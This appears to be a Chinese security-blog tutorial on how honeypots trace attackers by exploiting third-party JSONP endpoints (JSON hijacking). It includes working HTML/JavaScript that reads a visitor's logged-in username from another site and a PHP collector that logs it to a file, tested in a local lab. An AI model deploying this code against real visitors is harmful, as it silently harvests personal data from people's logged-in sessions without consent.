freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

蜜罐通过获取第三方信息溯源
2020-10-13 16:09:04

蜜罐介绍

蜜罐技术本质上是一种对攻击方进行欺骗的技术,通过布置一些作为诱饵的主机、网络服务或者信息,诱使攻击方对它们实施攻击,从而可以对攻击行为进行捕获和分析,了解攻击方所使用的工具与方法,推测攻击意图和动机,能够让防御方清晰地了解他们所面对的安全威胁,并通过技术和管理手段来增强实际系统的安全防护能力。

那么如何通过第三方接口获取信息,实现跨域资源

接口要求

1、登录过第三方网站,且未退出登录。

2、第三方网站接口能获取敏感信息(账号、ip、邮箱等),且允许跨域资源共享。

大部分使用jsonp接口,这种接口允许允许跨域资源共享。效果相对较好。因此这种攻击又叫JSON Hijacking。

流程实现图

通过访问站点A获取站点B的网站信息。

过程:访问A网站,获取登录过的B网站信息,再提交到A网站。

本地环境实践

本地搭建测试B站接口,当登录过这个站点显示登录名、没有登录过显示未登录。

登录过B站接口信息:

没有登录过B站接口信息:

返回的数据是一个jsonp的格式。

搭建蜜罐页面A站代码:

<html>
<head>
<script>
function test(a){
alert(a.name);
}
</script>
<script src='http://login.cn/login/api.php'></script>
</body>
</html>

当登陆B站后访问A站页面:

未登录B站访问A站页面:

可以看到通过A站跨域访问到B站资源。

简单构造接收页面data.php代码:

<?php 
$name=$_GET['name']; 
$fp = fopen('data.txt','a'); 
$flag = fwrite($fp, "用户名:  ".$name."\r\n"); 
?>

再重新修改一下A站页面代码:

<html>
<head>
<script>
function test(a){
    xmlhttp=new XMLHttpRequest()
    var x="./data.php?name="+a.name;
    xmlhttp.open("GET", x, true);
    xmlhttp.send();
}
</script>
<script src='http://login.cn/login/api.php'></script>
</body>
</html>

两次测试,分别登录与没有登录的情况下,记录的数据:

真实蜜罐获取情况:

总结:

蜜罐里面集成大量第三方接口,如社交、购物、娱乐等平台接口,一旦触发,将会大量信息被截取。慎重!慎重!

# 蜜罐 # 溯源
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录